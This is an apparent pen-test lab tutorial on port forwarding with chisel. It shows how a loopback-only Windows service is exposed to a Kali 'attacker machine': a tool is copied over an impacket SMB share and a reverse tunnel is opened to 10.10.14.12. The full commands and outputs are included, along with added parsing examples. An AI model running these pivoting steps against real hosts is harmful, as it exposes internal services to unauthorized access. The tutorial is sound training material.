How to do Port Forwarding in Windows
Port Forwarding from a Windows to a Linux Machine
Let’s assume a scenario during a pen-test where we have found a few services running locally on the Windows host and we need one of these applications/services to be accessible from the attacker machine. First, list the listening TCP sockets and their owning process IDs:
netstat -ano | findstr TCP | findstr ":0"
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 936
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5948
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 1616
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 6104
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 520
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1092
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1588
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2164
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 680
TCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 8112
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 5064
TCP [::]:135 [::]:0 LISTENING 936
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:7680 [::]:0 LISTENING 1616
TCP [::]:8080 [::]:0 LISTENING 6104
TCP [::]:49664 [::]:0 LISTENING 520
TCP [::]:49665 [::]:0 LISTENING 1092
TCP [::]:49666 [::]:0 LISTENING 1588
TCP [::]:49667 [::]:0 LISTENING 2164
TCP [::]:49668 [::]:0 LISTENING 668
TCP [::]:49669 [::]:0 LISTENING 680
c:\Users\shaun\temp>
In this case we can see that two services are bound only to the loopback address (127.0.0.1), so they are not reachable from the network; one of them is the service we need to make accessible from the attacker machine:
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 8112
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 5064
If you want to know which application or program is behind one of these sockets, use “tasklist /v | findstr 5064”, where 5064 is the process ID shown in the last column above.
In this case we want to make the service running on port 8888 accessible from the attacker machine in the lab. The tool I am using is “[chisel](https://github.com/jpillora/chisel)”, a fast TCP/UDP tunnel over HTTP; the Windows and Linux builds can be downloaded from the project’s GitHub page.
Download both the Windows and Linux versions
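The loopback-only review above is easy to do by eye on a short listing, but on a real host the list is long. As an added example (not part of the original write-up), here is a small Python parser for the “netstat -ano | findstr TCP” output format that picks out exactly the loopback-only listeners and their PIDs, the same check a defender runs when asking which local-only services a compromised host would expose through a tunnel. The sample lines are constructed in netstat’s format, not the page’s full capture.

```python
# Added example: parse `netstat -ano | findstr TCP` output and list the TCP
# services that listen only on a loopback address (127.0.0.1 or [::1]).
# The sample below is constructed in netstat's format; it is not a real capture.
SAMPLE_NETSTAT = """\
TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       6104
TCP    10.10.10.198:139       0.0.0.0:0              LISTENING       4
TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       8112
TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       5064
TCP    [::1]:9229             [::]:0                 LISTENING       7777
TCP    10.10.10.198:49700     10.10.14.12:8000       ESTABLISHED     5064
"""

LOOPBACK_HOSTS = {"127.0.0.1", "[::1]"}


def split_host_port(addr):
    """Split '127.0.0.1:3306' or '[::1]:9229' into (host, port).

    Partitioning on the last ':' keeps bracketed IPv6 hosts intact.
    """
    host, _, port = addr.rpartition(":")
    return host, int(port)


def loopback_listeners(netstat_text):
    """Return {port: pid} for TCP sockets in LISTENING state whose local
    address is loopback only. These services are unreachable from the
    network until something (such as a reverse tunnel) forwards them."""
    listeners = {}
    for line in netstat_text.splitlines():
        fields = line.split()
        # netstat -ano prints: Proto  Local Address  Foreign Address  State  PID
        if len(fields) != 5 or fields[0] != "TCP" or fields[3] != "LISTENING":
            continue
        host, port = split_host_port(fields[1])
        if host in LOOPBACK_HOSTS:
            listeners[port] = int(fields[4])
    return listeners


if __name__ == "__main__":
    for port, pid in sorted(loopback_listeners(SAMPLE_NETSTAT).items()):
        print(f"loopback-only listener: port {port} owned by PID {pid} "
              f"(identify it with: tasklist /v | findstr {pid})")
```

The ESTABLISHED line in the sample is deliberately ignored: only LISTENING sockets are candidates, and the IPv6 loopback entry shows why the host/port split must not break on the first colon.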
ls -al
total 23732
drwxr-xr-x 2 rocky rocky 4096 Feb 23 01:20 .
drwxr-xr-x 21 rocky rocky 4096 Feb 23 01:16 ..
-rw-r--r-- 1 rocky rocky 8077312 Jan 30 21:36 chisel_1.7.7_linux_amd64
-rw-r--r-- 1 rocky rocky 8230912 Jan 30 21:36 chisel_1.7.7_windows_amd64
-rw-r--r-- 1 rocky rocky 7981056 Jan 30 21:36 chisel_1.7.7_windows_arm64
┌──(rocky㉿kali)-[~/tool/exp/chisel]
└─$ impacket-smbserver smb . -smb2support -username df -password df
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
Directory of c:\Users\shaun\temp
23/02/2022 05:21 <DIR> .
23/02/2022 05:21 <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 9,817,460,736 bytes free
net use \\10.10.14.12\smb /u:df df
The command completed successfully.
copy \\10.10.14.12\smb\chisel_1.7.7_windows_amd64 exp.exe
1 file(s) copied.
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of c:\Users\shaun\temp
23/02/2022 06:23 <DIR> .
23/02/2022 06:23 <DIR> ..
31/01/2022 02:36 8,230,912 exp.exe
1 File(s) 8,230,912 bytes
2 Dir(s) 9,809,203,200 bytes free
net use /d \\10.10.14.12\smb
\\10.10.14.12\smb was deleted successfully.
Running Chisel in server mode on Linux (attacker machine)
On the attacker machine we run chisel in server mode. On the Kali Linux end, let’s start it as a server; I am using port 8000 on Linux as the tunnel port that the Windows client will connect to.
┌──(rocky㉿kali)-[~/tool/exp/chisel]
└─$ sudo ./chisel_1.7.7_linux_amd64 -h
Usage: chisel [command] [--help]
Version: 1.7.7 (go1.17.6)
Commands:
server - runs chisel in server mode
client - runs chisel in client mode
Read more:
https://github.com/jpillora/chisel
┌──(rocky㉿kali)-[~/tool/exp/chisel]
└─$ ./chisel_1.7.7_linux_amd64 server -p 8000 --reverse
2022/02/23 01:31:30 server: Reverse tunnelling enabled
2022/02/23 01:31:30 server: Fingerprint 5NdnDwnH2MLCfTDIQ5GcZMrw83etSLTjaAHTVBbs2+k=
2022/02/23 01:31:30 server: Listening on http://0.0.0.0:8000
Running Chisel in client mode on Windows (source machine)
At the Windows end we run chisel in client mode, as this is the machine where the application service is actually running locally. From the Windows machine, chisel forms a tunnel to the attacker machine (10.10.14.12:8000) and forwards the local service on port 8888 back through that tunnel, so the attacker machine ends up with its own listener on 8888.
c:\Users\shaun\temp>
.\exp.exe client 10.10.14.12:8000 R:8888:localhost:8888
2022/02/23 06:33:48 client: Connecting to ws://10.10.14.12:8000
2022/02/23 06:33:48 client: Connected (Latency 59.6776ms)
The connection confirmation can be seen at the server end as well:
└─$ ./chisel_1.7.7_linux_amd64 server -p 8000 --reverse
2022/02/23 01:31:30 server: Reverse tunnelling enabled
2022/02/23 01:31:30 server: Fingerprint 5NdnDwnH2MLCfTDIQ5GcZMrw83etSLTjaAHTVBbs2+k=
2022/02/23 01:31:30 server: Listening on http://0.0.0.0:8000
2022/02/23 01:33:40 server: session#1: tun: proxy#R:8888=>localhost:8888: Listening
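The R:8888:localhost:8888 argument and the server’s “proxy#R:8888=>localhost:8888: Listening” line are two views of the same remote spec. To make that mapping concrete, here is an added Python example (not chisel’s own code) that decodes a chisel remote following the defaults documented in chisel’s README (local-host 0.0.0.0, local-port equal to remote-port, remote-host 0.0.0.0) and reports which side ends up listening and where the traffic is delivered. It is a simplified parser: bracketed IPv6 hosts and the special socks remote are not handled (assumption).

```python
from dataclasses import dataclass


@dataclass
class Remote:
    """One chisel remote. For a reverse remote (R: prefix) the listener is
    opened on the server and the client delivers traffic to the target; for
    a normal remote the roles are swapped."""
    reverse: bool
    local_host: str
    local_port: int
    remote_host: str
    remote_port: int
    protocol: str = "tcp"

    def listener(self):
        side = "server" if self.reverse else "client"
        return f"{side} listens on {self.local_host}:{self.local_port}/{self.protocol}"

    def target(self):
        side = "client" if self.reverse else "server"
        return f"{side} delivers to {self.remote_host}:{self.remote_port}"


def parse_remote(spec):
    """Decode [R:]<local-host>:<local-port>:<remote-host>:<remote-port>[/proto].
    Simplified parser (assumption): no bracketed IPv6 hosts, no 'socks'."""
    reverse = spec.startswith("R:")
    body = spec[2:] if reverse else spec
    body, _, protocol = body.partition("/")
    parts = body.split(":")
    if not 1 <= len(parts) <= 4 or not parts[-1].isdigit():
        raise ValueError(f"unsupported remote spec: {spec!r}")
    # Fields are filled from the right: remote-port is mandatory, the others
    # fall back to chisel's documented defaults.
    remote_port = int(parts[-1])
    remote_host = parts[-2] if len(parts) >= 2 else "0.0.0.0"
    local_port = int(parts[-3]) if len(parts) >= 3 else remote_port
    local_host = parts[-4] if len(parts) == 4 else "0.0.0.0"
    return Remote(reverse, local_host, local_port, remote_host, remote_port,
                  protocol or "tcp")


if __name__ == "__main__":
    r = parse_remote("R:8888:localhost:8888")   # the remote used in this post
    print(r.listener())   # server listens on 0.0.0.0:8888/tcp
    print(r.target())     # client delivers to localhost:8888
```

Read against the log line above: the server opens 0.0.0.0:8888 (which is why netstat on Linux shows chisel owning both 8000 and 8888), and every connection to it is relayed by the Windows client to its own localhost:8888.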
On the Linux machine we can now see both the forwarded port 8888 (the Windows service) and port 8000 (the tunnel port), and both sockets are owned by the chisel process:
┌──(rocky㉿kali)-[~]
└─$ netstat -ntlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp6 0 0 :::8000 :::* LISTEN 4274/./chisel_1.7.7
tcp6 0 0 :::8888 :::* LISTEN 4274/./chisel_1.7.7